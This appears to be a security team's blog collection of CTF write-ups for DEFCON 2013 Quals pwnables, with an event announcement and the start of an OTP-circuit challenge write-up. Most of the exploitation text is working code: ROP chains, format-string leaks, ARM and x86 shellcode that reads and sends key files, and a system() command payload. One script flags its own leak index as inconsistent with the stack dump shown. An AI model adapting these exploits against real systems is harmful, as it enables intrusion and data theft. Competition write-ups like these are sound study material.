forks and the shellcode is executed in the child) from the child, because the parent reads the key into a buffer and simply waits 15 seconds before exiting. We tried to make gdb read the parent memory from the shell we had, but could not get it working, contrary to other teams, as we discovered at the end of the CTF. So we built a shellcode that uses
ptrace
to read the key from the parent process. It was pretty straightforward to write; it simply:
- gets the PID of the parent,
- attaches to this parent,
- waits for the parent,
- gets the
rbp
of the parent, which is useless because it should be the same for both processes, but we used it to debug our shellcode so we kept it,
- finds the address of the allocated buffer,
- sends the content of this buffer over the socket.
However we got stuck at this point with all our
PTRACE_PEEKTEXT
failing. We had used the manpage of ptrace(2)
to fill in the ptrace syscall arguments, but this manpage actually documents the ptrace wrapper in the glibc, which does not use the same arguments as the Linux syscall: for the PEEK requests, the raw syscall stores the word at the address passed in the data argument instead of returning it. We lost a lot of time on this stupid mistake. Anyway, here is the final working shellcode:
```nasm ; getppid xor rax, rax mov al, 0x6e syscall mov r14, rax
; ptrace_attach mov rdi, 0x10 mov rsi, r14 xor rax, rax mov al, 0x65 syscall
; wait() xor rdi, rdi dec rdi xor rsi, rsi xor rdx, rdx xor rcx, rcx xor rax, rax mov al, 61 syscall
; ptrace_getregs mov rdi, 0xc mov rsi, r14 xor rdx, rdx mov r10, rsp xor rdx, rdx xor rax, rax mov al, 0x65 syscall xor r10, r10
mov r12, [rsp + 4*8] ; get the parent rbp add r12, -0x18 ; r12 = location of the wanted buffer
; ptrace_peektext : get the address of the buffer mov rdi, 0x1 mov rsi, r14 mov rdx, r12 mov r10, rsp xor rax, rax mov al, 0x65 syscall
; from r12 to r13 = (r12 + 0x80) mov r12, [rsp] mov r13, r12 ; to r13 add r13, 0x80
loop: ; ptrace_peektext mov rdi, 0x1 mov rsi, r14 mov rdx, r12 mov r10, rsp xor rax, rax mov al, 0x65 syscall
; write rax mov rax, [rsp] push rax push rsp pop rsi ; buf mov rdi, 0x4 ; fd mov rdx, 0x8 ; len xor rax, rax inc rax syscall pop rax
add r12, 0x8 cmp r12, r13 jbe loop
DEFCON 2013 Quals: Ergab - Exploitation (0x41414141) 3
Score 3 Link http://assets-2013.legitbs.net/liabilities/ergab
This challenge was an ARM binary, our goal was to print the content of a file named “key”. Like the bitterswallow challenge, the first part of the program was not that interesting since it was only doing the setup of the socket and the privileges. However, the program was written in C++ with some objects.
The first thing it does is open a file (questions.txt), read some questions with their answers, and initialize a structure based on them. The format of the file is the following:
5 # the number of questions Question1?;resp1;resp2;resp3;resp4; Question2?;resp1;resp2;resp3;resp4; Question3?;resp1;resp2;resp3;resp4; Question4?;resp1;resp2;resp3;resp4; Question5?;resp1;resp2;resp3;resp4;
The correct answer is always the last one of each line.
Then it prints some questions and the answers in a random order. It looks like:
Question? 1) rep2 2) rep4 3) rep1 4) rep3 Answer:
The answer the program expects is the number followed by a newline.
Once you have correctly answered 5 questions, the binary reads your name — up to 0x100 bytes — into a buffer of size 0x10. After that it sends our name back and then asks if we want to play again.
So our first step will be to pass the question. The questions were relative to the Dr Who Series. Here is the code we used to answer them:
import socket import struct import sys, time HOST = 'lolergab.shallweplayaga.me' PORT = 5000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _send(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return s.send(st) def _recv(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r def _pack(i): return struct.pack('<I', i) def _unpack(b): return struct.unpack('<I', b)[0] # For passing the questions tab_quest = [] ans_quest = [] tab_quest.append("What is the name of the Doctor's robotic dog?") ans_quest.append("K-9") tab_quest.append("What is the name of the town being guarded by the Gunslinger?") ans_quest.append("Mercy") tab_quest.append("Which planet are the Slitheen from?") ans_quest.append("Raxacoricofallapatorius") tab_quest.append("What do the Daleks call the Doctor on their home planet?") ans_quest.append("The Oncoming Storm") tab_quest.append('What is the name of the last human in "The End of the World"?') ans_quest.append('Cassandra') tab_quest.append("What is the actual name of River Song?") ans_quest.append("Melody Pond") tab_quest.append("Who is the astronaut who kills the Doctor?") ans_quest.append("River Song") tab_quest.append("How many Doctors have there been?") ans_quest.append("11") tab_quest.append("When the Doctor first meets Oswin what has she become?") ans_quest.append("A Dalek") tab_quest.append("Who founded Torchwood?") ans_quest.append("Queen Victoria") tab_quest.append("What company were the Cybermen made by?") ans_quest.append("Cybus Industries") tab_quest.append("What does TARDIS stand for?") ans_quest.append(" Time And Relative Dimension In Space") tab_quest.append("How did the Doctor get the TARDIS?") ans_quest.append("He stole it.") tab_quest.append("What was the monster in the episode 'Blink'?") ans_quest.append("Weeping Angels") def recv_line(): r = "" t = _recv(1) while t != b'\n' : r += str(t, "utf-8") t = _recv(1) 
return r def get_quest(): q = recv_line() a1 = recv_line() a2 = recv_line() a3 = recv_line() a4 = recv_line() _recv("\nAnswer: ") print("Question:") print(q) return q, a1[3:], a2[3:], a3[3:], a4[3:] def resolve_quest(t): q, a1, a2, a3, a4 = t print(a1, a2, a3, a4) if q in tab_quest: st = ans_quest[tab_quest.index(q)] print(st) if st == a1: _send("1\n") if st == a2: _send("2\n") if st == a3: _send("3\n") if st == a4: _send("4\n") else: t = sys.stdin.readline() _send(t + "\n") recv_line() def pass_quest(): i = 0 while i < 5: resolve_quest(get_quest()) i += 1 _recv("What is your name: ")
The first step of the exploit is to bypass the ASLR by leaking an address. After getting our name the program sends it as a string (it is doing a strlen and then sends the right length back). When looking at our stack we can see that we have two values right after our buffer: the first one is an address on the stack, the second one is the return address of our function.
To get these addresses, we send exactly the right number of characters so that our name runs right up to them. The strlen will then hopefully consider these addresses to be part of the string. From the data we receive we can extract the addresses we need, one on our stack and one in our binary.
#FIRST part : leak the addr of our buffer and of the addr of return pass_quest() payload = b"a" * 4 payload += b"a" * 4 payload += b"a" * 3 _send(payload + b"\n") _recv("Congrats ") t = _recv("aaaaaaaaaaa\n\xbc\xe5\xd0\xbex\xc6\xf9\xb6>") ADDR_BUF = _unpack(t[12:16]) - 40 # the address of our buffer ADDR_RET_CONGRATS = _unpack(t[16:20]) # the address of return BASE_ASLR = ADDR_RET_CONGRATS - 0x1678 # the base of the mapping for our section print ("addr buf :", hex(ADDR_BUF)) print ("addr ret congrats :", hex(ADDR_RET_CONGRATS)) print ("base ASLR :", hex(BASE_ASLR)) # we receve again a string _recv("Would you like to try again (y/n): ") # we have not done yet _send("y\n")
Now that we have our address we can start leaking the address from the libc to have some useful address and apply the shellcode that we used for the first exercise (See BittersWallow write-up).
To leak the address from the libc we need to send ourselves the data from the got. To do so we need to call some function, we will use some gadgets to do it, the exact same one that we used in BittersWallow.
There was one thing to take care of when we rewrote our stack: putting a valid pointer at the place just before the return address because it was a pointer to a structure which was modified by the function before its own return, if we put something which was not valid the program would segfault.
Here is the code of this second step:
#SECOND part : leek the addr of getpwnam from the libc SOCKET_FD = 4 USELESS = 0 GOT_PWNAM = BASE_ASLR + 0xd224 GADGET_CALL = BASE_ASLR + 0x45fc GADGET_PIVOT = BASE_ASLR + 0x4618 ADDR_SEND_DATA = BASE_ASLR + 0x3cfc ADDR_MAIN_LOOP = BASE_ASLR + 0x1ee8 def _call_func(addr, arg1, arg2, arg3): # 8 pack payload = _pack(addr) # call addr. (r3) payload += _pack(0) # counter loop (r4) payload += b'\x41' * 4 # padding. (r5) payload += _pack(1) # second counter (r6) payload += _pack(arg1) # first arg (r7) payload += _pack(arg2) # second arg (r8) payload += _pack(arg3) # third arg (r10) payload += _pack(GADGET_CALL) # next addr (pc) return payload pass_quest() payload = b"a" * 12 # padding payload += _pack(ADDR_BUF + 40) # the addr of the ifs struct payload += _pack(GADGET_PIVOT) # our first addr the pivot # the call for leak the addr in the libc of PWNAM payload += _call_func(ADDR_SEND_DATA, SOCKET_FD, GOT_PWNAM, 4) # the call for continue to loop and the exploitation payload += _call_func(ADDR_MAIN_LOOP, SOCKET_FD, USELESS, USELESS) _send(payload + b"\n") ADDR_GETPWNAM = _unpack(_recv(4)) print ("addr getpwnam :", hex(ADDR_GETPWNAM))
So we now have the address of
getpwnam
. From the first binary we have a valid shellcode and we have everything we need to trigger it. As we have modified our stack, the address of the buffer we got the first time is not valid anymore. To get the right value we can just redo the first step:
pass_quest() payload = b"a" * 4 payload += b"a" * 4 payload += b"a" * 3 _send(payload + b"\n") _recv("Congrats ") t = _recv("aaaaaaaaaaa\n\xbc\xe5\xd0\xbex\xc6\xf9\xb6>") ADDR_BUF = _unpack(t[12:16]) - 40 _recv("Would you like to try again (y/n): ") _send("y\n")
Now we have to exploit, the goal being to first allocate a page (we will call mmap) then we will read to receive the shellcode and put it into the page, and finally we will call that page.
We need two more gadgets to do it: one is a simple pop and the other is the syscall itself. These gadgets and the way we found their offsets are explained in the BittersWallow write-up. The shellcode does the following:
fd = open("key"); read(fd, addr_in_stack, 255); write(socket_fd, addr_in_stack, 255);
Here is the code for calling the shellcode:
pass_quest() shc = '0f00a0e1400080e20010a0e30570a0e3000000ef01dc4de201dc4de20d10a0e1ff20' shc += 'a0e30370a0e3000000ef0400a0e30d10a0e1ff20a0e30470a0e3000000ef01dc8d' shc += 'e201dc8de26b65790000000000' shellcode = bytes.fromhex(shc) ADDR_MMAP_BUF = 0x13371000 MMAP_SYSCALL = 192 OFFSET_SYSCALL, OFFSET_GADGET = 428, 324 payload = b"a" * 12 # padding payload += _pack(ADDR_BUF + 40) # the addr of the struct payload += _pack(GADGET_PIVOT) # the first return # setting everything for the syscall payload += _call_func(GADGET_PIVOT, ADDR_MMAP_BUF, 4096, 7) payload += _pack(0x32) * 4 payload += _pack(MMAP_SYSCALL) payload += _pack(0x32) * 2 payload += _pack(ADDR_GETPWNAM + OFFSET_SYSCALL) # the addr of the syscall payload += _pack(0) * 13 # padding for the pop after the syscall payload += _pack(GADGET_PIVOT) # return for pushing some argument # call the recv for our shellcode payload += _call_func(ADDR_RECV_DATA, SOCKET_FD, ADDR_MMAP_BUF, len(shellcode)) # call our shellcode payload += _call_func(ADDR_MMAP_BUF, 0, 0, 0) _send(payload + b"\n") # send the shellcode input("ShellCode?") _send(shellcode + b"\n") # recv the result while len(_recv(1024)) == 1024 : pass while len(_recv(1024)) == 1024 : pass
For this challenge we had a lot of hard work already done for the previous challenge, but it was different and we had an interesting way of leaking the address.
DEFCON 2013 Quals: BittersWallow - Exploitation (0x41414141) 1
Score 1 Link http://assets-2013.legitbs.net/liabilities/bs
This binary was compiled for the ARM architecture, and our goal was to exploit it to get the “key” file on the remote server. The first part of the binary does the setup of all the common things found in pwnables, including:
- opening a socket
- identifying itself as a pre-defined user (bitterswallow)
- dropping privileges
The interesting part comes after, in a function called
ff
. The first thing it does is send some text: Welcome to the sums. Are you ready? (y/n):
And wait for an answer. It then compares it to ‘y’ or ‘Y’. If the answer is different it simply closes the connection. Once this is done we enter a loop where two functions are called.
The first one waits for an input of one byte and then goes into a big switch according to this byte. All the cases but one come back to the same point (
0xa114
) where it waits for another user input which is the length of a future message. The length sent can’t be over 0x400. The particular case, triggered with value 0x1a
, doesn’t check this and doesn’t even ask for any length. The pseudo C code for this function is:
int get_meta(int fd, int *input, int *value_get) { int choice; int value; long long int size; if (!input || !value_get || !recvdata(fd, &choice, 1)) return 0; *input = choice; switch (choice & 0x3f) { case 0: value = 0x32444d; // Some value? break; // ... case 0x1a: goto last; // ... default: break; } if (!recvdata(fd, &size, 2)) return 0; if (size > 0x400) size = 0x400; last: size = (size << 16) >> 16; *value_get = value; return size; }
Then a second function is called. It receives data of the size returned by the first one in a buffer of
0x400
, and then computes a hash (depending on the values chosen in the first function), except for the case 0x1a
which doesn’t compute the hash. It then sends this hash and asks if we want to do the whole loop again. Here is the pseudo C code for this function:
int compute(int fd, int size, int input, int value_get) { int res_recv; char buf[0x400]; char buf_hash[0x40]; memset(buf, 0, 0x400); memset(buf_hash, 0, 0x40); printf("%x %x %x\n", size, input, value_get); recvdata(fd, buf, size); switch (input & 0x3f) { case 0 : res_recv = ... hash(buf, size, buf_hash); break; ... case 0x1a : res_recv = 0; break; ... default: break; } send_data(fd, buf_hash, res_recv); send_string(fd, "Would you like to sum another? (y/n): "); recvdata(fd, &res_recv, 1); if (res_recv == 'y' || res_recv == 'Y') return 1; else return 0; }
Depending on the value returned by this function, its caller continues the loop or stops. To exploit this function the goal is to control the size that the first function returns and that the second one uses. Since the
case 0x1a
doesn’t do any check, we will use it to return a bogus size and then overwrite our stack to use Return-Oriented Programming. To set that size we can use the second function, which writes to the same part of the stack: the content of size is in the same place as the end of the hash buffer.
So we need to:
- do a normal computation that rewrites something at the place of size
- do another iteration with the choice 0x1a and rewrite all our stack.
One of the problems that we need to take care of is not to have a value which is too big because we risk to rewrite all of our stack which can make our exploit fail.
_recv("Welcome to the sums.\n") _recv("Are you ready? (y/n): ") _send("y") _send(b"\x32") # case 50 : sha512 _send(b"\x00\x03") # send a size _send("x" * 0x300) # send a value, with this we have a size of 0x7b3 while len(_recv(1024)) == 1024: # pass all the writing pass _send("y") # say yes to do an other one _send(b"\x1a") # case 0x1a : doesn't check the size # Here we can send the data for rewritting our stack
At this point we can rewrite our stack but we don’t have any address from the libc so we can’t do a lot of things. There is no syscall in the binary so we can’t do anything with full ROP yet.
The first thing to do is to leak some information on the libc, like an address from the GOT which gives us the information on where libc is mapped. We chose to leak the address of
getpwnam
(but any other function could work). To leak the address of
getpwnam
we needed to call the send_data
function (0x1d9fc
) on the position of the entry for getpwnam
in the GOT. The first arguments of a function on ARM are passed through the registers r0, r1, r2 and r3, so we needed a gadget that takes values from the stack and puts them in the registers that we need. The gadget we used to do this is in __libc_csu_init
:loc_1E3C4 LDR R3, [R5], #4 MOV R0, R6 ; loc_1E3C8 MOV R1, R7 MOV R2, R8 ADD R4, R4, #1 BLX R3 CMP R4, R10 BNE loc_1E3C4 loc_1E3E4: LDMFD SP!, {R3-R8, R10, PC}
If we go to
0x1e3e4
we can put values in registers r3 to r8 and r10, and choose the return address, all from our stack. At 0x1e3c8
we can copy the values from r6 to r8 into r0 to r2 (our first arguments) and then call the function stored in r3, and if we put the right values in r4 and r10 we will reach our first gadget again. Note that if we need to make a call with some values in registers like r3 (something other than the function address), we can call our first gadget and have these values on the stack too (useful to call mmap). So we now have everything we need to leak the address from the
libc
. Here is the code we used to do so:import struct import socket import sys HOST = 'bitterswallow.shallweplayaga.me' PORT = 6492 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _send(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return s.send(st) def _recv(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r def _pack(i): return struct.pack('<I', i) def _unpack(b): return struct.unpack('<I', b)[0] PIVOT_ADDR = 0x1e3e4 PIVOT2_ADDR = 0x1e3c8 SENDDATA_ADDR = 0x1d9fc FF_ADDR = 0x8dfc GETPWNAM_GOT_ADDR = 0x27114 SOCKET_FD = 4 USELESS = 0x46474849 # length of 8 int def _call_func(addr, arg1, arg2, arg3): payload = _pack(addr) # call addr. payload += _pack(0) # counter loop (r4) payload += b'\x41' * 4 # padding. payload += _pack(arg1) # first arg (r6) (fd) payload += _pack(arg2) # second arg (r7) (data) payload += _pack(arg3) # third arg (r8) (length) payload += _pack(1) # counter higher stone. (r10) payload += _pack(PIVOT2_ADDR) # next addr (pc) return payload def _send_bof(payload): p = b"a" * 0x440 p += _pack(0x41424344) p += _pack(PIVOT_ADDR) p += payload p += b'y' * (0x7b3 - len(p)) # 0xe70 _send(p) def pass_menu(): _recv("Welcome to the sums.\n") _recv("Are you ready? 
(y/n): ") _send("y") _send(b"\x32") # case 50 : sha512 _send(b"\x00\x03") # send a size _send("x" * 0x300) # send a value, with this we have a size of 0x7b3 while len(_recv(1024)) == 1024: # pass all the writing pass _send("y") # say yes to do an other one _send(b"\x1a") # case 0x1a : doesn't check the size input('Ready?') # Stage 1: pass_menu() # we get pass the menu payload = _call_func(SENDDATA_ADDR, SOCKET_FD, GETPWNAM_GOT_ADDR, 40) payload += _call_func(FF_ADDR, SOCKET_FD, USELESS, USELESS) _send_bof(payload) #we send our payload _send("y") # we send this because we need a flush addrs = _recv(38) addrs = _recv(40) addrs = _recv(40) # the four first char are the address of getpwnam in the libc
Now that we have the address of
getpwnam
, we can leak information from the libc. At this point you have two possibilities: you can leak the whole libc, compute the offset of a function relative to the address of
getpwnam
and call it (ret2libc). The other possibility is to leak part of the libc and find some gadgets in there to finish the exploitation with full ROP. We chose the second option and searched for syscalls in the libc. When leaking the instructions from the libc we look for one particular instruction: a syscall (svc 0, opcode
0x000000ef
)We find this instruction in
getpwnam
implementation: the syscall was at the offset 428. (This offset changes depending on your libc so you should recompute them if you are not using the exact same libc). The gadget for the syscall is:SVC 0 B loc_AAA loc_AAA: LDR R0, [SP, 0x14] ADD SP, SP, 0x18 LDMFD SP!, {R4-R10, PC}
The gadget for the pop is :
LDMFD SP!, {R4-R10, PC}
In order to leak the offset we use the following code :
pass_menu() print("Addr: ", addrs) payload = _call_func(SENDDATA_ADDR, SOCKET_FD, _unpack(addrs[:4]), 4096) payload += _call_func(FF_ADDR, SOCKET_FD, USELESS, USELESS) _send_bof(payload) _send("y") while len(_recv(1024)) == 1024: pass while len(_recv(1024)) == 1024: pass CHUNK = 1024 r = _recv(CHUNK) res = r while len(r) == CHUNK: r = _recv(CHUNK) res += r _send('y') while len(r) == CHUNK: r = _recv(CHUNK) res += r _send('y') while len(r) == CHUNK: r = _recv(CHUNK) res += r print(' RES:', res[:12]) for i in range(len(res) // 4): opcode = _unpack(res[i * 4:(i + 1) * 4]) if opcode == 0xef000000: # looking for the syscall print('Found syscall opcode at offset:', i * 4) print('Buff:', res[i * 4:(i + 5) * 4]) _send("y") while len(_recv(1024)) == 1024: pass _send("y") while len(_recv(1024)) == 1024: pass
Now that we have the offset of our gadget we can ROP. Our goal is to call
mmap
, then read from our input into the allocated page, and finally execute it. The following code does that:
MMAP_BUF_ADDR = 0x13371000 MMAP_SYSCALL = 192 READ_SYSCALL = 3 OFFSET = 428 GETPWNAM_ADDR = _unpack(addrs[:4]) print('getpwnam addr:', hex(GETPWNAM_ADDR)) pass_menu() # jump to pivot addr and put some stuf in the register for the syscall payload = _call_func(PIVOT_ADDR, MMAP_BUF_ADDR, 4096, 7) payload += _pack(0x32) # some flag payload += _pack(0x41424344) * 3 # padding payload += _pack(MMAP_SYSCALL) # the number of the syscall is in r7 payload += _pack(0x41424344) * 2 #padding payload += _pack(GETPWNAM_ADDR + OFFSET) # addr of the syscall payload += _pack(0xffffffff) # padding payload += _pack(0) * 12 # padding payload += _pack(PIVOT_ADDR) # return addr # pushing again for an other syscall payload += _call_func(PIVOT_ADDR, SOCKET_FD, MMAP_BUF_ADDR, 4096) payload += _pack(0x41424344) * 4 # padding payload += _pack(READ_SYSCALL) # the number of the syscall payload += _pack(0x41424344) * 2 # padding payload += _pack(GETPWNAM_ADDR + OFFSET) # addr of the syscall gadget payload += _pack(0) * 13 # padding payload += _pack(MMAP_BUF_ADDR) # the last return to our shellcode _send_bof(payload) _recv(1024) _send('y') _recv(1024)
At this point we only needed to send it the shellcode. We wrote one that was pretty simple :
- open the file “key”.
- read its content.
- write the buffer read on the socket.
Here is the final code for sending the shellcode and recv the result :
# sending shellcode. # fd = open("key"); read(fd, addr_in_stack, 255); write(socket_fd, addr_in_stack, 255); shellcode = '0f00a0e1400080e20010a0e30570a0e3000000ef01dc4de201dc4de20d10a' shellcode += '0e1ff20a0e30370a0e3000000ef0400a0e30d10a0e1ff20a0e30470a0e30' shellcode += '00000ef01dc8de201dc8de26b65790000000000' _send(bytes.fromhex(shellcode)) while _recv(1024): pass
You can find the complete exploit here.
DEFCON 2013 Quals: Annyong - Exploitation (0x41414141) 4
Score 4 Link http://assets-2013.legitbs.net/liabilities/annyong
This binary was an elf64 stripped for x86_64, the goal was to exploit and get a shell on the remote server.
The code was quite explicit. We have a buffer of 0x80c bytes and a 4-byte variable (an int) which is set to 0. The program has one loop: it checks that the variable is still 0, then reads up to 0x900 bytes from the standard input into the buffer, then checks whether the string contains the character ‘n’. If it does, it prints an error message and continues; otherwise it does a
printf
of the buffer, flushes and continues. Here is the equivalent C code:
/*
 * Reconstruction of the challenge's main loop.
 *
 * The two flaws below are the subject of the write-up and are reproduced
 * on purpose:
 *   - fgets() is allowed to write 0x900 bytes into a 0x80c-byte buffer
 *     (stack overflow past the buffer and the fake canary);
 *   - the user-controlled buffer is used directly as a printf format.
 * Lines containing the character 'n' are rejected before reaching printf.
 */
void loop()
{
    char buf[0x80c];
    int fake_canary = 0;

    /* The loop keeps running only while the int after the buffer is 0. */
    while (!fake_canary) {
        /* Intentional overflow: 0x900 > sizeof(buf). */
        if (!fgets(buf, 0x900, stdin))
            break;

        if (strchr(buf, 'n'))
            puts("I don't think so...");
        else
            printf(buf); /* Intentional format-string bug. */

        fflush(stdout);
    }
}
In this code, we have two obvious problems. The first one is the
printf
: we can leak the stack from this call, but we can’t use ‘%n’ to rewrite something. On the other hand we have a buffer overflow of almost 0x100 (256), that we can use to rewrite a good part of our stack to use ROP and then ret2Libc.We need to exploit this binary to be able to leak information about known addresses that will allow us to have the information on the position of other functions and in a second stage we will need to rewrite our stack to execute the code we want.
For the first part we will use the call to
printf
, we will use ‘%llx’ to print 64 bits from the stack. To leak a precise part of our stack we can use the ‘$’ positional specifier to directly select the argument we want. So let’s do the first step: we can look at what we have on the stack with our
printf
:%261$llx | %262$llx | %263$llx | %264$llx | %265$llx | %266$llx | %267$llx | %268$llx | %269$llx | %270$llx 0 | 555555555130 | 55554c60 | 7fffffffe9e0 | 555555555127 | 0 | 7ffff7a4fa15 | 0 | 7fffffffeac8 | 100000000
When looking in
gdb
we can see :$ x/i 0x7ffff7a4fa15 0x7ffff7a4fa15 <__libc_start_main+245>: mov %eax,%edi
When you look a little more you see that this address is the address of return from our main. So we have actually an address in the libc. So we can now have the address we want from the libc, by calculating the offset between the functions’ codes. We knew that the distant machine uses Ubuntu, so we checked the offset in a corresponding libc.
Now that we have one address in the libc we can try to call “system”. To do so, we need to have an address in memory that we know and where we can write the command to give to system. The simplest way to do that is probably to leak the address of our buffer. Since its address is given on the stack to the
printf
function, it should be at the beginning of our stack:%4$llx 7fffffffe1c0 (gdb) x/s 0x7fffffffe1c0 0x7fffffffe1c0: "%4$llx\n"
So we now have all the information that we need to call system. The last problem we face is the calling convention in x86_64, which is like in ARM, through registers: rdi, rsi, rdx, rcx, r8, r9. So we needed a gadget to extract our arguments from the stack.
The first gadget we are interested in is in
__libc_csu_init
(0x11b8
):mov rbx, [rsp+0x08] mov rbp, [rsp+0x10] mov r12, [rsp+0x18] mov r13, [rsp+0x20] mov r14, [rsp+0x28] mov r15, [rsp+0x30] add rsp, 0x38 retn
This gadget takes a lot of values from the stack and puts them in some registers. Now we need to move the values from these registers to the ones we are interested in, so we need another gadget, and we can still find it in
__libc_csu_init
at0x1180
, just before the previous one:loc_1180: mov rdx, r15 mov rsi, r14 mov edi, r13d call qword ptr [r12 + rbx * 8] add rbx, 1 cmp rbx, rbp jnz short loc_1180
So we now have something that looks good: we can take the values from our stack and put them in the registers we need. We just have one last problem: we move the value in edi, not in rdi and so the address of the buffer we will give to system will not be good and our call will not work.
So we need a last gadget to put the address of our buffer in rdi. We can find it at 0x1086:
mov rdi, rsi retn
Now that we have all the gadgets we need, we still have to find their addresses; for that we need to leak one address in our program. In the leak we did before, we saw that at
%262$llx
we have0x555555555130
, so in gdb:(gdb) x/i 0x555555555130 0x555555555130 <__libc_csu_init>: mov %rbp,-0x28(%rsp)
So we have a point in our binary from which we can calculate the offset for our gadgets.
So now we have all our exploit, here is the code we wrote:
import socket
import struct

HOST = 'annyong.shallweplayaga.me'
PORT = 5679

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))


def _send(st, end=b''):
    """Send *st* followed by *end* on the socket.

    A ``str`` is encoded as UTF-8 first.  Returns the number of bytes sent.
    """
    if isinstance(st, str):
        st = bytes(st, 'utf-8')
    st += end
    print('Send:', repr(st))
    # sendall() keeps writing until the whole buffer is out; a bare send()
    # may transmit only part of the (roughly 2 KiB) overflow payload.
    s.sendall(st)
    return len(st)


def _recv(l):
    """Receive up to *l* bytes; if *l* is a str, its length is used."""
    if isinstance(l, str):
        l = len(l)
    r = s.recv(l)
    if r:
        print('Recv:', repr(r))
    return r


def _pack(i):
    """Pack *i* as a little-endian unsigned 64-bit value."""
    return struct.pack('<Q', i)


def _unpack(b):
    """Unpack a little-endian unsigned 64-bit value from *b*."""
    return struct.unpack('<Q', b)[0]


def _leak(fmt):
    """Send the format string *fmt* and return the leaked value.

    The reply is expected to start with the hexadecimal value printed by
    the remote printf, terminated by the '|' we put in the format string.
    """
    _send(fmt)
    reply = _recv(1024)
    return int(reply.split(b"|")[0].decode('ascii'), 16)


# Offset between the return of the main and the begin of system
OFFSET_RETMAIN_SYSTEM = 147187

input("Ready?")

# Here we get the address of the return of our main in the libc
ADDR_RETMAIN = _leak("%267$llx| \n")

# We calculate the address of the begin of system
ADDR_SYSTEM = ADDR_RETMAIN + OFFSET_RETMAIN_SYSTEM

print("Addr retmain: ", hex(ADDR_RETMAIN))
print("Addr system: ", hex(ADDR_SYSTEM))

# We leak the address of our buffer
ADDR_BUF = _leak("%4$llx|\n")
print("Addr buf: ", hex(ADDR_BUF))

# We leak the address of __libc_csu_init
# NOTE(review): the stack dump shown in the write-up has __libc_csu_init at
# %262$llx (and 0 at %261$llx) -- confirm which index the target needs.
ADDR_CSU_INIT = _leak("%261$llx|\n")
print("Addr csu init: ", hex(ADDR_CSU_INIT))

# We compute the address for each gadget
ADDR_PIVO_ARG = ADDR_CSU_INIT + 0x66    # first gadget
ADDR_GADJ_CALL = ADDR_CSU_INIT + 0x50   # second gadget
ADDR_GADJ_RDI = ADDR_CSU_INIT - 170     # third gadget
ADDR_LOOP_PRINC = ADDR_CSU_INIT - 164   # the address of the loop

st = b"cat home/fmtstr/key \x00"    # here is our command
si = len(st)
st += _pack(ADDR_GADJ_RDI)          # we put the address in our buffer
st += b" " * (0x810 - len(st))      # padding for finishing the buffer
st += b"a" * 8
st += _pack(ADDR_PIVO_ARG)          # we return here

st += _pack(0)                      # padding
st += _pack(0)                      # rbx
st += _pack(1)                      # for the counter (rbp)
st += _pack(ADDR_BUF + si)          # addr to the addr to call (r12)
st += _pack(0)                      # first arg (r13)
                                    # we put nothing in here it's useless
st += _pack(ADDR_BUF)               # second arg (r14)
                                    # it will be put in rsi and then in rdi for the call.
st += _pack(0)                      # third arg (r15)
st += _pack(ADDR_GADJ_CALL)         # gadget call, the return from our first gadget

# here we are back from our second and third gadget, so rdi point on our buffer
st += _pack(1)                      # padding
st += _pack(2)                      # rbx
st += _pack(ADDR_BUF)               # for the counter (rbp)
st += _pack(4)                      # addr to call (r12)
st += _pack(5)                      # first arg (r13)
st += _pack(6)                      # second arg (r14)
st += _pack(7)                      # third arg (r15)
st += _pack(ADDR_SYSTEM)            # Here is our return
st += _pack(ADDR_LOOP_PRINC)        # return to the main loop
st += _pack(ADDR_LOOP_PRINC)        # return to the main loop
st += b"\n"

_send(st)

# Read full 1024-byte chunks, then one last (shorter) chunk.
while len(_recv(1024)) == 1024:
    pass
_recv(1024)
Since we could execute any command with this exploit, we first had to find where the key file was and then we got it with
cat home/fmtstr/key
.The vulnerability in this challenge was quite obvious but it was interesting to bypass some common protections while exploiting it.
LSE Week 2013 announcement
For the third year, we are going to give 3 days of talks to show the work we are doing here at the LSE, about various themes we like, have encountered or that seem interesting.
We have scheduled these 3 days for July 16 to July 18, from 10:00am to 05:00pm.
This year, we are also opening the talks to external contributors, and all the LSE members, present or past.
All the talks will be in French and as usual we will try to record everything.
If you want to talk or come, you can find all the information about this summer week on its dedicated page.
NDH2K13 misc400 writeup: OMG, electronics…
Found some information about what seems to be an OTP. And a webpage asking
for a valid token. The design draft we retrieved looks terrible, they must have got it fixed, yet the algorithm should be similar. Score 400 Link http://z0b.nuitduhack.com:8001/
The goal of this exercise was to understand the given electronic schematic of a One-time-password generator. This device generates new unique passwords at a fixed time interval. Two tokens were also given as part of the challenge’s instructions, with the time they were generated so the goal was to get the algorithm used by the device to generate a new token from the previous one, to find the generation frequency and so to deduce what the token is at the current time.
We translated the diagram into a python script to easily generate as many token as we wanted.
Okay, so let’s break down this circuit, it’s not that complicated, the tokens are just 32 bits long.
The first part, in yellow, simply stores the token that is currently displayed by the device in eight different 4-bit flip-flops. It is important to note, as written on the diagram, that the 7-segment display negates its input before displaying it, so the wire at the top of the diagram is the complement of the token. The wires that go to the pink block (a0-a31) are the token itself.
The next block, the pink one, uses the previous token to compute the address of the byte sent to the next block. The selector, on the right, extracts the token bits four at a time, and each 4-bit group is xored with the value of a simple counter.
def compute_addr_from_previous_token(previous_token):
    """The Pink Block.

    Return, in order, the list of the 8 addresses computed from the
    previous token: the token is consumed 4 bits at a time, starting from
    the least significant nibble, and each nibble is xored with a counter
    going from 0 to 7.

    Raises ValueError if previous_token does not fit in 32 bits.
    """
    # Explicit check instead of a trailing assert: asserts are stripped
    # when Python runs with -O, which would let a bad token through.
    if not 0 <= previous_token <= 0xffffffff:
        raise ValueError(
            "TOKEN OUT OF RANGE : {0}".format(previous_token))

    addrs = []
    for count in range(8):
        # Extract the 4 lowest bits of the token
        v = previous_token & 0xf
        previous_token >>= 4
        # Xor with the counter value
        addrs.append(v ^ count)
    return addrs
The generated address is then used, in the blue block, to read the seed value (also given in the instructions) at the computed offset, one byte at a time. This byte is then stored in two of the 4-bits flip-flops in the orange block, either in the two flip-flops at the top of the block or at the bottom, every two cycles. These two bytes are xored together, after their 4 higher bits were complemented.
# From the instructions
seed = "025EF87E7819E3A3B48E92CD92E7AB35"

